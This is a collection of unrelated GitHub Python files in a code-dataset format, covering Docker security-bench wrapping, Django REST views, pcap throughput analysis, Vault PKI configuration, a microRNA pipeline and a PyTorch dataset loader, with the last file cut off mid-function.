logging.debug(\"Trtl.rollback results: output={}, err={}, exitcode={}\"\n .format(out, err, code))\n return code, err\n\n def run_docker_bench_security_test(self) -> Optional[str]:\n \"\"\"Runs DBS script via TRTL\n @return: output from DBS script\n \"\"\"\n cmd = self._boilerplate(\"dockerbenchsecurity\")\n out, err, code = self.runner.run(cmd)\n\n if code == 0:\n logger.debug(\"Docker security bench executed\")\n return out\n else:\n if err is None:\n err = \"\"\n logger.debug(\"Could not run docker security bench : \" + err)\n\n return 
None\n","repo_name":"intel/intel-inb-manageability","sub_path":"inbm-lib/inbm_lib/trtl.py","file_name":"trtl.py","file_ext":"py","file_size_in_byte":22544,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"3"} +{"seq_id":"3918808871","text":"# coding=utf-8\n\nfrom faker import Faker\nimport math\n\n\n# 状态位Provider\nclass LocationProvider(object):\n def __init__(self, loc_type):\n \"\"\"\n 产生地理位置的provider\n :param type: 0表示latitude, 1表示longitude\n \"\"\"\n self.loc_type = loc_type\n self.fake = Faker()\n\n def random_status(self):\n if self.loc_type == 0:\n return int(math.fabs(self.fake.latitude() * 1000000))\n else:\n return int(math.fabs(self.fake.longitude() * 1000000))\n\n\nif __name__ == \"__main__\":\n sp = LocationProvider(1)\n print(sp.random_status())\n","repo_name":"gdchaochao/tsdb-data-generator","sub_path":"myfaker/provider/LocationProvider.py","file_name":"LocationProvider.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73722674320","text":"\"\"\"\nView classes to help facilitate the creation of REST APIs\n\"\"\"\nimport json\n\nfrom django.core.exceptions import PermissionDenied, ValidationError\nfrom django.http import HttpResponse, Http404\nfrom django.views.generic.base import View\nfrom django.conf import settings\n\nfrom argonauts import dumps\n\n\nclass JsonResponseMixin(object):\n \"\"\"\n Sets the response MIME type to ``application/json`` and serializes the\n context obj as a JSON string.\n \"\"\"\n def render_to_response(self, obj, **response_kwargs):\n \"\"\"\n Returns an ``HttpResponse`` object instance with Content-Type:\n application/json.\n\n The response body will be the return value of ``self.serialize(obj)``\n \"\"\"\n return HttpResponse(self.serialize(obj), content_type='application/json', **response_kwargs)\n\n def serialize(self, obj):\n \"\"\"\n Returns a json serialized string object encoded using\n `argonauts.serializers.JSONArgonautsEncoder`.\n \"\"\"\n return dumps(obj)\n\n def http_method_not_allowed(self, *args, **kwargs):\n \"\"\"\n Returns super after setting the Content-Type header to\n ``application/json``\n \"\"\"\n resp = super(JsonResponseMixin, self).http_method_not_allowed(*args, **kwargs)\n resp['Content-Type'] = 'application/json'\n\n return resp\n\n\nclass JsonRequestMixin(object):\n \"\"\"\n Adds a ``data`` method on the view instance. It returns the GET parameters\n if it is a GET request. It will return the python representation of the\n JSON sent with the request body.\n \"\"\"\n def data(self):\n \"\"\"\n Helper class for parsing JSON POST data into a Python object.\n \"\"\"\n if self.request.method == 'GET':\n return self.request.GET\n else:\n assert self.request.META['CONTENT_TYPE'].startswith('application/json')\n charset = self.request.encoding or settings.DEFAULT_CHARSET\n return json.loads(self.request.body.decode(charset))\n\n\nclass RestView(JsonResponseMixin, JsonRequestMixin, View):\n \"\"\"\n Inherit this base class to implement a REST view.\n\n This view will handle:\n - authentication (throuh the ``auth`` method)\n - dispatching to the proper HTTP method function\n - returning a proper error status code.\n\n It also implements a default response for the OPTIONS HTTP request method.\n \"\"\"\n def auth(self, *args, **kwargs):\n \"\"\"\n Hook for implementing custom authentication.\n\n Raises ``NotImplementedError`` by default. 
Subclasses must overwrite\n this.\n \"\"\"\n raise NotImplementedError(\"If you really want no authentication, override this method\")\n\n def dispatch(self, *args, **kwargs):\n \"\"\"\n Authenticates the request and dispatches to the correct HTTP method\n function (GET, POST, PUT,...).\n\n Translates exceptions into proper JSON serialized HTTP responses:\n - ValidationError: HTTP 409\n - Http404: HTTP 404\n - PermissionDenied: HTTP 403\n - ValueError: HTTP 400\n \"\"\"\n try:\n self.auth(*args, **kwargs)\n return super(RestView, self).dispatch(*args, **kwargs)\n except ValidationError as e:\n return self.render_to_response(e.message_dict, status=409)\n except Http404 as e:\n return self.render_to_response(str(e), status=404)\n except PermissionDenied as e:\n return self.render_to_response(str(e), status=403)\n except ValueError as e:\n return self.render_to_response(str(e), status=400)\n\n def options(self, request, *args, **kwargs):\n \"\"\"\n Implements an OPTIONS HTTP method function returning all allowed HTTP\n methods.\n \"\"\"\n allow = []\n for method in self.http_method_names:\n if hasattr(self, method):\n allow.append(method.upper())\n r = self.render_to_response(None)\n r['Allow'] = ','.join(allow)\n return r\n","repo_name":"fusionbox/django-argonauts","sub_path":"argonauts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4048,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"3"} +{"seq_id":"19103006050","text":"import sys\nimport scapy.all as scapy\n\nq_disc = sys.argv[2]\n\nprint(\"\")\nprint(f\"Reading {q_disc} packets....\")\nstart_time = 0\n\ndata_sent = [0] * 6\ntime = 0.2\n\nf = open(\"data.txt\", \"w+\")\n\nprint(\"Analyzing data....\")\nprint(\"Completed: 0%\", end=\"\\r\")\nwith scapy.PcapReader(f\"{sys.argv[1]}/r1_r2.pcap\") as pr:\n sum = 0\n for ind, i in enumerate(pr):\n if ind == 0:\n start_time = i.time\n ip = ''\n \n if i.type == 2048:\n ip = i['IP'].dst\n \n if i.time - start_time >= time:\n print(f\"Completed: {int(time/3)}%\", end=\"\\r\")\n for j in data_sent:\n sum += j\n sum *= 10\n sum = sum / 25000\n f.write(f\"{time}\\t{data_sent[0]/25000}\\t{data_sent[1]/25000}\\t{data_sent[2]/25000}\\t{data_sent[3]/25000}\\t{data_sent[4]/25000}\\t{data_sent[5]/25000}\\t{sum}\\n\")\n time += 0.2\n if time > 300:\n break\n data_sent = [0] * 6\n sum = 0\n\n if ip == '10.2.0.1':\n data_sent[0] += len(i)\n elif ip == '10.2.0.2':\n data_sent[1] += len(i)\n elif ip == '10.2.0.3':\n data_sent[2] += len(i)\n elif ip == '10.2.0.4':\n data_sent[3] += len(i)\n elif ip == '10.2.0.5':\n data_sent[4] += len(i)\n elif ip == '10.2.0.6':\n data_sent[5] += len(i) \n else:\n pass\n\t\n\nf.close()\n","repo_name":"hrishikeshathalye/EvalAQM","sub_path":"scripts/pcap_scrap.py","file_name":"pcap_scrap.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"26561727692","text":"#!/usr/bin/python\n\nfrom hvac.api.secrets_engines.pki import DEFAULT_MOUNT_POINT\nfrom ansible_collections.community.hashi_vault.plugins.module_utils._hashi_vault_module import HashiVaultModule\n\nfrom ..module_utils.utils import get_client\n\n\ndef main():\n argspec = HashiVaultModule.generate_argspec(\n mount_point=dict(type='str', default=DEFAULT_MOUNT_POINT),\n issuing_certificates=dict(type='list', elements='str', default=[]),\n crl_distribution_points=dict(type='list', elements='str', default=[]),\n ocsp_servers=dict(type='list', elements='str', 
default=[]),\n enable_templating=dict(type='bool', default=False),\n )\n\n module = HashiVaultModule(\n argument_spec=argspec,\n supports_check_mode=True\n )\n\n mount_point = module.params['mount_point']\n issuing_certificates = module.params['issuing_certificates']\n crl_distribution_points = module.params['crl_distribution_points']\n ocsp_servers = module.params['ocsp_servers']\n enable_templating = module.params['enable_templating']\n\n client = get_client(module)\n\n data = client.secrets.pki.read_urls(mount_point=mount_point)['data']\n params = {'issuing_certificates': issuing_certificates,\n 'crl_distribution_points': crl_distribution_points,\n 'ocsp_servers': ocsp_servers,\n 'enable_templating': enable_templating}\n\n if params == data:\n module.exit_json(changed=False)\n\n response = client.secrets.pki.set_urls(mount_point=mount_point,\n params=params)\n module.exit_json(changed=True, data=response['data'])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mmas/hashi_vault-ansible-collection","sub_path":"plugins/modules/vault_pki_urls.py","file_name":"vault_pki_urls.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28992392932","text":"import multiprocessing as mp\nimport os\nfrom pathlib import Path\nfrom time import time\nfrom typing import Optional, Tuple\nimport warnings\n\nfrom absl import app\nfrom absl import flags\nfrom absl import logging\nimport pandas as pd\n\nimport constants\nimport utils\n\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nwarnings.simplefilter(action='ignore', category=UserWarning)\nwarnings.simplefilter(action='ignore', category=RuntimeWarning)\n\nFLAGS = flags.FLAGS\n\nflags.DEFINE_integer(\n 'cpus', None, \n 'Number of CPUs to use in parallel. default: all available cpus are used.')\nflags.DEFINE_string(\n 'data_path', None, \n ('Path to dataset. if %s: path to dataset. if %s: path to the folder containing %s '\n 'folders.' % (constants._DATA_TYPE_SINGLE_CELL, constants._DATA_TYPE_SPATIAL,\n ' and '.join(constants._SPATIAL_FOLDERS))))\nflags.DEFINE_string(\n 'dataset_name', None, \n 'Name of your dataset. This is used to generate the results path')\nflags.DEFINE_boolean(\n 'debug', False, 'Produces debugging output.')\nflags.DEFINE_integer(\n 'filter_spots', None, \n 'Filter spots containing total amount of reads below the specified number. '\n 'default: do not filter any spot.')\nflags.DEFINE_string(\n 'miR_figures', constants._DRAW_TOP_10, \n 'Which microRNA activity maps to draw. Options: %s .' % ' or '.join(constants._SUPPORTED_DRAW))\nflags.DEFINE_list(\n 'miR_list', None, \n ('Comma-separated list of microRNAs to compute. default: all microRNAs are computed. '\n 'Example use: -miR_list=hsa-miR-300,hsa-miR-6502-5p,hsa-miR-6727-3p'))\nflags.DEFINE_list(\n 'populations', None,\n ('Comma-separated list of two unique population string identifiers embedded in cell id. ' \n 'default: None. Example use: -populations=\'DESEASE_\',\'CONTROL_\''))\nflags.DEFINE_boolean(\n 'preprocess', False, \n ('Performs additional preprocessing on %s data before computations, merges all '\n 'tables found in \'data_path\' and samples 10K columns.' % constants._DATA_TYPE_SINGLE_CELL))\nflags.DEFINE_string(\n 'results_path', None, \n 'Path to save results.')\nflags.DEFINE_integer(\n 'sample_size', constants._MAX_COLS, \n 'Amount of cells to sample in total. default: %s.' 
% constants._MAX_COLS)\nflags.DEFINE_string(\n 'species', constants._SPECIES_HOMO_SAPIENS, \n 'Options: %s .' % ' or '.join(constants._SUPPORTED_SPECIES))\nflags.DEFINE_float(\n 'thresh', constants._ACTIVITY_THRESH, \n ('Threshold of the microRNA activity p-value. If a microRNA receives a lower score than '\n ' \'thresh\' it is considered active. Used to find the most active microRNAs '\n 'across the provided data.'))\n\nflags.register_validator('species', \n lambda value: value in constants._SUPPORTED_SPECIES,\n message='Either %s are supported.' % \n ' or '.join(constants._SUPPORTED_SPECIES))\nflags.register_validator('miR_figures', \n lambda value: value in constants._SUPPORTED_DRAW,\n message='Either %s are supported.' %\n ' or '.join(constants._SUPPORTED_DRAW))\n\nflags.mark_flag_as_required('dataset_name')\nflags.mark_flag_as_required('data_path')\n\ndef data_handling(data_path: str, dataset_name: str, data_type: Optional[str], \n preprocess: Optional[bool]=True, filter_spots: Optional[int]=None, \n sample_size: Optional[int]=constants._MAX_COLS) -> Tuple[pd.DataFrame, pd.DataFrame]:\n '''Loading, preprocessing (if needed) and normalizing data.\n\n Args:\n data_path: path to data.\n dataset_name: dataset name.\n data_type: (optional) data type 'spatial' or 'scRNAseq'.\n preprocess: (optional) if True, performing data preprocessing if data is too big or is\n composed of multiple files. If False, will not perform data preprocessing. \n filter_spots: (optional) filter spots containing total number of reads below this number.\n sample_size: (optional) amount of cells to sample.\n\n Returns:\n counts_norm: normalized reads table\n counts: raw reads table\n '''\n if not data_type:\n data_type = utils.check_data_type(data_path)\n\n if data_type == constants._DATA_TYPE_SPATIAL:\n counts = utils.visium_loader(data_path, filter_spots)\n else:\n if preprocess:\n counts = utils.scRNAseq_preprocess_loader(dataset_name, data_path, sample_size)\n else:\n counts = utils.scRNAseq_loader(data_path)\n \n counts_norm = utils.normalize_counts(counts)\n return counts_norm, counts\n\ndef computing_mir_activity(counts_norm: pd.DataFrame, results_path: str, miR_list: Optional[list], \n cpus: Optional[int], species: Optional[str]=constants._SPECIES_HOMO_SAPIENS, \n debug: Optional[bool]=False) -> Tuple[list, pd.DataFrame]:\n '''Computing microRNA activity across the data.\n\n Args:\n counts_norm: normalized reads table.\n results_path: path to save results.\n miR_list: (optional) list of microRNAs to compute.\n cpus: (optional) amount of cpus to use in parallel.\n species: (optional) either 'homo_sapiens' (default) or 'mus_musculus' are supported. \n debug: (optional) if True, provides additional information. 
Default=False.\n \n Returns:\n miR_list: the final list of microRNAs that were computed.\n miR_activity_pvals: microRNA activity score per cell/spot.\n '''\n cpus = cpus or mp.cpu_count()\n logging.info('Using %i cpus', cpus)\n\n mti_data, miR_list = utils.mir_data_loading(\n miR_list=miR_list, \n species=species, \n debug=debug)\n \n start = time() \n miR_activity_pvals = utils.compute_mir_activity(\n counts_norm, \n miR_list, \n mti_data, \n results_path, \n cpus, \n debug=debug)\n logging.info('Computation time: %f minutes', (time() - start) / 60)\n\n return miR_list, miR_activity_pvals\n\n\ndef mir_post_processing_spatial(data_path: str, counts_norm: pd.DataFrame, miR_activity_pvals: pd.DataFrame, \n miR_list: list, results_path: str, dataset_name: str, data_type: Optional[str],\n miR_figures: Optional[str]=constants._DRAW_TOP_10, \n thresh: Optional[float]=constants._ACTIVITY_THRESH) -> None:\n '''Performs post processing on spatial data.\n\n First sorting microRNAs by their overall level of activity, \n and then plotting according to user's requirement.\n If there are <= 10 microRNAs, or the user wants plots for all microRNAs, \n the function produces activity maps for all microRNAs without sorting first.\n\n Args:\n data_path: path to data.\n counts_norm: normalized reads table.\n miR_activity_pvals: microRNA activity results per spot.\n miR_list: list of microRNAs.\n results_path: path to save results.\n dataset_name: dataset name. \n data_type: (optional) data type 'spatial' or 'scRNAseq'.\n miR_figures: which microRNAs to plot. \n thresh: threshold to define what is considered active.\n\n Returns:\n None.\n\n Raises:\n UsageError if spatial data was not found in data_path.\n '''\n if not data_type:\n data_type = utils.check_data_type(data_path)\n if data_type != constants._DATA_TYPE_SPATIAL:\n raise utils.UsageError('No spatial data was found for post-processing in %s' % data_path)\n logging.info('Generating activity map figures')\n spatial_coors = utils.get_spatial_coors(data_path, counts_norm)\n spots = spatial_coors.shape[0]\n\n mir_activity_list = utils.sort_activity_spatial(\n miR_activity_pvals, \n thresh, \n spots, \n results_path, \n dataset_name)\n\n miR_list_figures = utils.get_figure_list(\n miR_list,\n miR_figures,\n mir_activity_list)\n\n utils.produce_spatial_maps(\n miR_list_figures, \n miR_activity_pvals, \n spatial_coors, \n results_path, \n dataset_name, \n mir_activity_list)\n\ndef mir_post_processing_sc(data_path: str, counts: pd.DataFrame, miR_activity_pvals: pd.DataFrame, \n miR_list: list, results_path: str, dataset_name: str, data_type: Optional[str],\n miR_figures: Optional[str]=constants._DRAW_TOP_10, populations: Optional[list]=None) -> None:\n '''Performs post processing on scRNAseq data.\n\n Computes UMAP based on gene expression, sorts microRNAs by their overall level of activity, \n and plots UMAP according to user's requirement.\n If there are <= 10 microRNAs, or the user wants plots for all microRNAs, \n the function produces activity maps for all microRNAs without sorting first.\n\n Args:\n data_path: path to data.\n counts: raw reads table.\n miR_activity_pvals: microRNA activity results per spot.\n miR_list: list of microRNAs.\n results_path: path to save results.\n dataset_name: dataset name. \n data_type: (optional) data type 'spatial' or 'scRNAseq'.\n miR_figures: (optional) which microRNAs to plot. 
\n populations: (optional) list of two population string identifiers embedded in cell id.\n\n Returns:\n None.\n\n Raises:\n UsageError if scRNAseq data was not found in data_path.\n '''\n if not data_type:\n data_type = utils.check_data_type(data_path)\n if data_type != constants._DATA_TYPE_SINGLE_CELL:\n raise utils.UsageError('No scRNAseq data was found for post-processing in %s' % data_path)\n logging.info('Single cell post processing')\n enriched_counts = utils.generate_umap(\n counts, \n miR_activity_pvals,\n populations)\n\n mir_activity_list = utils.sort_activity_sc(\n miR_activity_pvals, \n populations)\n\n miR_list_figures = utils.get_figure_list(\n miR_list,\n miR_figures,\n mir_activity_list)\n\n utils.plot_sc(\n miR_list_figures, \n enriched_counts,\n results_path, \n dataset_name, \n mir_activity_list,\n miR_activity_pvals,\n populations)\n\n\ndef compute(data_path: str, dataset_name: str, miR_list: Optional[list], cpus: Optional[int],\n results_path: Optional[str], sample_size: Optional[int]=constants._MAX_COLS, \n species: Optional[str]=constants._SPECIES_HOMO_SAPIENS, \n miR_figures: Optional[str]=constants._DRAW_TOP_10, \n preprocess: Optional[bool]=True, thresh: Optional[float]=constants._ACTIVITY_THRESH,\n populations: Optional[list]=None, debug: Optional[bool]=False, filter_spots: Optional[int]=None):\n '''Performing end-to-end microRNA activity map computation.\n\n Loading spatial/scRNAseq data and preprocessing if needed.\n Computing microRNA activity for all spots/cells.\n Saving results locally and producing maps for spatial data.\n\n Args:\n data_path: path to data.\n dataset_name: dataset name. \n miR_list: (optional) list of microRNAs to compute.\n cpus: (optional) amount of cpus to use in parallel.\n results_path: (optional) path to save results.\n sample_size: (optional) desired sample size for amount of cells.\n species: (optional) either 'homo_sapiens' (default) or 'mus_musculus' are supported. \n miR_figures: (optional) which microRNAs to plot. \n preprocess: (optional) if True, performing data preprocessing if data is too big or is\n composed of multiple files. If False, will not perform data preprocessing. \n thresh: (optional) threshold to define what is considered active.\n populations: (optional) list of two population string identifiers embedded in cell id.\n debug: (optional) if True, provides additional information. 
Default=False.\n filter_spots: (optional) filter spots containing total reads below this number.\n\n Returns:\n None\n '''\n if debug:\n logging.set_verbosity(logging.DEBUG)\n logging.debug('Debug mode is on')\n else:\n logging.set_verbosity(logging.INFO)\n\n logging.info('Dataset name: %s', dataset_name)\n logging.info('Path to dataset: %s', data_path)\n\n if results_path:\n results_path = os.path.join(results_path, dataset_name)\n else:\n results_path = os.path.join(data_path, 'results')\n logging.info('Results path: %s', results_path)\n \n data_type = utils.check_data_type(data_path)\n \n counts_norm, counts = data_handling(\n data_path, \n dataset_name, \n data_type=data_type, \n preprocess=preprocess,\n filter_spots=filter_spots,\n sample_size=sample_size)\n\n miR_list, miR_activity_pvals = computing_mir_activity(\n counts_norm, \n results_path, \n miR_list=miR_list, \n cpus=cpus, \n species=species,\n debug=debug)\n\n if data_type == constants._DATA_TYPE_SPATIAL:\n mir_post_processing_spatial(\n data_path, \n counts_norm, \n miR_activity_pvals, \n miR_list=miR_list, \n results_path=results_path, \n dataset_name=dataset_name,\n data_type=data_type,\n miR_figures=miR_figures, \n thresh=thresh)\n else:\n mir_post_processing_sc(\n data_path, \n counts, \n miR_activity_pvals, \n miR_list=miR_list, \n results_path=results_path, \n dataset_name=dataset_name,\n data_type=data_type,\n miR_figures=miR_figures,\n populations=populations)\n logging.info('Done.')\n\ndef main(argv):\n compute(\n data_path=FLAGS.data_path, \n dataset_name=FLAGS.dataset_name, \n miR_list=FLAGS.miR_list, \n cpus=FLAGS.cpus, \n results_path=FLAGS.results_path, \n sample_size=FLAGS.sample_size,\n species=FLAGS.species, \n miR_figures=FLAGS.miR_figures,\n preprocess=FLAGS.preprocess, \n thresh=FLAGS.thresh,\n populations=FLAGS.populations,\n debug=FLAGS.debug,\n filter_spots=FLAGS.filter_spots)\n\nif __name__ == '__main__': \n app.run(main)","repo_name":"EfiHerbst31/microRNA-activity-maps","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15608367960","text":"def pdt_of_3(arr):\n\n if len(arr) < 3:\n raise Exception(\"please check your input\")\n\n highest = max(arr[0], arr[1])\n lowest = min(arr[0], arr[1])\n\n highest2 = lowest2 = arr[0] * arr[1]\n\n highest3 = arr[0] * arr[1] * arr[2]\n\n for i in range(2, len(arr)):\n\n highest3 = max(highest3, arr[i] * highest2, arr[i] * lowest2)\n\n highest2 = max(highest2, arr[i] * highest , arr[i] * lowest)\n lowest2 = min(lowest2, arr[i] * lowest, arr[i] * highest)\n\n highest = max(highest, arr[i])\n lowest = min(lowest, arr[i])\n\n return highest3\n\n\nif __name__ == \"__main__\":\n arr = [1,10,-5,1,-100]\n print(pdt_of_3(arr))\n","repo_name":"pavankumar2203/InterviewcakeSolutions","sub_path":"3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25829334912","text":"import os\nfrom setuptools import setup, find_packages\n\n# Utility function to read the README file.\n# Used for the long_description. 
It's nice, because now 1) we have a top level\n# README file and 2) it's easier to type in the README file than to put a raw\n# string in below ...\n\n# SCRIPTS = []\n# SCRIPTS.extend([os.path.join(\"scripts\", script)\n# \t\t\t\tfor script in os.listdir(os.path.join(os.path.dirname(__file__), \"scripts\"))\n# \t\t\t\tif script.endswith(\".py\")])\n\nHERE = os.path.abspath(os.path.dirname(__file__))\nwith open(os.path.join(HERE, 'README.md'), 'r') as fid:\n\tLONG_DESCRIPTION = fid.read()\n\nsetup(\n\tname=\"fununifrac\",\n\tversion=\"0.0.1\",\n\tauthor=\"David Koslicki\",\n\tauthor_email=\"dmkoslicki@gmail.com\",\n\tdescription=(\"A repository to implement UniFrac, but on functional profiles of metagenomic data.\"),\n\tlong_description=LONG_DESCRIPTION,\n\t#license=\"BSD-3-Clause\", # see classifiers\n\tkeywords=\"unifrac kegg emd genomics metagenomics\",\n\turl=\"https://github.com/KoslickiLab/FunUniFrac\",\n\tpackages=find_packages(),\n\tinstall_requires=[\n\t 'blist',\n 'scipy==1.8.0',\n 'networkx==2.8.4',\n 'numpy==1.23.2',\n 'pandas==1.4.3',\n 'pyemd==0.5.1',\n 'sparse',\n 'requests',\n 'seaborn'\n ],\n\tzip_safe=False,\n\t# package_data={'CMash': ['data/*.fna', 'tests/Organisms/*.fna.gz']},\n\t# scripts=SCRIPTS,\n\tentry_points={\n 'console_scripts': [ \n 'compute_fununifrac.py = fununifrac.compute_fununifrac:main',\n\t \t'compute_edges.py = fununifrac.compute_edges:main',\n\t\t 'create_edge_matrix.py = fununifrac.create_edge_matrix:main'\n ]\n },\n\tclassifiers=[\n\t\t\"Development Status :: 3 - Alpha\",\n\t\t\"Topic :: Scientific/Engineering :: Bio-Informatics\",\n\t\t\"Topic :: Scientific/Engineering :: Mathematics\",\n\t\t\"License :: OSI Approved :: BSD License\",\n\t\t\"Intended Audience :: Science/Research\",\n\t\t\"Programming Language :: Python :: 3.6\",\n\t\t\"Programming Language :: Python :: 3.7\",\n\t\t\"Programming Language :: Python :: 3.8\",\n\t\t\"Programming Language :: Python :: 3.9\",\n\t\t\"Natural Language :: English\",\n\t\t\"Operating System :: MacOS :: MacOS X\",\n\t\t\"Operating System :: POSIX :: Linux\",\n\t]\n)","repo_name":"KoslickiLab/FunUniFrac","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"71464110481","text":"import torch\nimport torch.utils.data as data\n\nfrom PIL import Image\n\nimport os\nimport os.path\nimport sys\n\n\ndef has_file_allowed_extension(filename, extensions):\n \"\"\"Checks if a file is an allowed extension.\n\n Args:\n filename (string): path to a file\n extensions (iterable of strings): extensions to consider (lowercase)\n\n Returns:\n bool: True if the filename ends with one of given extensions\n \"\"\"\n filename_lower = filename.lower()\n return any(filename_lower.endswith(ext) for ext in extensions)\n\n\ndef is_image_file(filename):\n \"\"\"Checks if a file is an allowed image extension.\n\n Args:\n filename (string): path to a file\n\n Returns:\n bool: True if the filename ends with a known image extension\n \"\"\"\n return has_file_allowed_extension(filename, IMG_EXTENSIONS)\n\n\ndef make_dataset(dir, class_to_idx, extensions):\n \"\"\"\n Parameters\n ----------\n dir : str\n path to the root of the dataset\n class_to_idx : dict[str, int]\n dir name and the value is index. e.g. 
{'id_0': 0, 'id_1': 1, ..., }\n extensions : list[str]\n list of allowed extensions\n\n Returns\n -------\n list[(str, int)]\n list of (image path, class index) tuples\n \"\"\"\n images = []\n dir = os.path.expanduser(dir)\n for target in sorted(class_to_idx.keys()):\n d = os.path.join(dir, target)\n if not os.path.isdir(d):\n continue\n\n for root, _, fnames in sorted(os.walk(d)):\n for fname in sorted(fnames):\n if has_file_allowed_extension(fname, extensions):\n path = os.path.join(root, fname)\n item = (path, class_to_idx[target])\n images.append(item)\n\n return images\n\n\nclass DatasetFolder(data.Dataset):\n \"\"\"A generic data loader where the samples are arranged in this way: ::\n\n root/class_x/xxx.ext\n root/class_x/xxy.ext\n root/class_x/xxz.ext\n\n root/class_y/123.ext\n root/class_y/nsdf3.ext\n root/class_y/asd932_.ext\n\n Args:\n root (string): Root directory path.\n loader (callable): A function to load a sample given its path.\n extensions (list[string]): A list of allowed extensions.\n transform (callable, optional): A function/transform that takes in\n a sample and returns a transformed version.\n E.g, ``transforms.RandomCrop`` for images.\n target_transform (callable, optional): A function/transform that takes\n in the target and transforms it.\n\n Attributes:\n classes (list): List of the class names.\n class_to_idx (dict): Dict with items (class_name, class_index).\n samples (list): List of (sample path, class_index) tuples\n targets (list): The class_index value for each image in the dataset\n \"\"\"\n\n def __init__(\n self,\n root,\n loader,\n extensions,\n transform=None,\n target_transform=None):\n\n # class_to_idx: the key is dir name and the value is index.\n # {'id_0': 0, 'id_1': 1, ..., }\n classes, class_to_idx = self._find_classes(root)\n\n # The type of samples: [(img_path, class_idx), (img_path,\n # class_idx),...]\n samples = make_dataset(root, class_to_idx, extensions)\n if len(samples) == 0:\n raise(\n RuntimeError(\n \"Found 0 files in subfolders of: \" +\n root +\n \"\\n\"\n \"Supported extensions are: \" +\n \",\".join(extensions)))\n\n self.root = root\n self.loader = loader\n self.extensions = extensions\n\n self.classes = classes\n self.class_to_idx = class_to_idx\n self.samples = samples\n self.targets = [s[1] for s in samples]\n\n self.transform = transform\n self.target_transform = target_transform\n\n def _find_classes(self, dir):\n \"\"\"\n Finds the class folders in a dataset.\n\n Args:\n dir (string): Root directory path.\n\n Returns:\n tuple: (classes, class_to_idx) where classes are relative to (dir), and class_to_idx is a dictionary.\n\n Ensures:\n No class is a subdirectory of another.\n \"\"\"\n if sys.version_info >= (3, 5):\n # Faster and available in Python 3.5 and above\n classes = [d.name for d in os.scandir(dir) if d.is_dir()]\n else:\n classes = [\n d for d in os.listdir(dir) if os.path.isdir(\n os.path.join(\n dir, d))]\n classes.sort()\n classes.sort(key=lambda x: int(x[3:]))\n\n # the key is dir name and the value is index.\n # {'id_0': 0, 'id_1': 1, ..., }\n class_to_idx = {classes[i]: i for i in range(len(classes))}\n return classes, class_to_idx\n\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n\n Returns:\n tuple: (sample, target) where target is class_index of the target class.\n \"\"\"\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform is not None:\n sample = self.transform(sample)\n if self.target_transform is not None:\n target = 
self.target_transform(target)\n imgname = path.split('/')[-1].replace('.JPEG', '')\n return sample, target, imgname\n\n def __len__(self):\n return len(self.samples)\n\n def __repr__(self):\n fmt_str = 'Dataset ' + self.__class__.__name__ + '\\n'\n fmt_str += ' Number of datapoints: {}\\n'.format(self.__len__())\n fmt_str += ' Root Location: {}\\n'.format(self.root)\n tmp = ' Transforms (if any): '\n fmt_str += '{0}{1}\\n'.format(tmp,\n self.transform.__repr__().replace('\\n',\n '\\n' + ' ' * len(tmp)))\n tmp = ' Target Transforms (if any): '\n fmt_str += '{0}{1}'.format(tmp,\n self.target_transform.__repr__().replace('\\n',\n '\\n' + ' ' * len(tmp)))\n return fmt_str\n\n\nIMG_EXTENSIONS = [\n '.jpg',\n '.jpeg',\n '.png',\n '.ppm',\n '.bmp',\n '.pgm',\n '.tif',\n '.tiff',\n '.webp']\n\n\ndef pil_loader(path, input_ch=3):\n # open path as file to avoid ResourceWarning\n # (https://github.com/python-pillow/Pillow/issues/835)\n with open(path, 'rb') as f:\n img = Image.open(f)\n if input_ch == 1:\n return img.convert('L')\n return img.convert('RGB')\n\n\ndef default_loader(path, input_ch=3):\n return pil_loader(path, input_ch)\n\n\nclass ImageFolderRemap(DatasetFolder):\n def __init__(\n self,\n root,\n transform=None,\n target_transform=None,\n loader=default_loader,\n remap_table=None,\n with_idx=False,\n input_ch=3):\n super(\n ImageFolderRemap,\n self).__init__(\n root,\n loader,\n IMG_EXTENSIONS,\n transform=transform,\n target_transform=target_transform)\n\n self.imgs = self.samples\n self.class_table = remap_table\n self.with_idx = with_idx\n self.input_ch = input_ch\n\n def __getitem__(self, index):\n # The type of self.samples: [(img_path, class_idx), (img_path,\n # class_idx),...]\n path, target = self.samples[index]\n cnt_idx = int(os.path.splitext(os.path.basename(path))[0])\n sample = self.loader(path, self.input_ch)\n if self.transform is not None:\n sample = self.transform(sample)\n if self.target_transform is not None:\n target = self.target_transform(target)\n target = self.class_table[target]\n if self.with_idx:\n return sample, index, target\n\n # The type of sample is PIL.Image\n # The type of target is int\n # target is the target font id\n return sample, target, cnt_idx\n\n\nclass ImageFolderRemapPair(DatasetFolder):\n def __init__(\n self,\n root,\n transform=None,\n target_transform=None,\n loader=default_loader,\n input_ch=1,\n pair_size=2,\n ):\n super(\n ImageFolderRemapPair,\n self).__init__(\n root,\n loader,\n IMG_EXTENSIONS,\n transform=transform,\n target_transform=target_transform)\n\n self.imgs = self.samples\n self.input_ch = input_ch\n self.pair_size = pair_size\n\n def __getitem__(self, index):\n # The type of self.samples: [(img_path, class_idx), (img_path,\n # class_idx),...]\n samples = []\n targets = []\n cnt_idxs = []\n for i in range(self.pair_size):\n # The type of sample is PIL.Image\n # The type of target is int\n # target is the target font 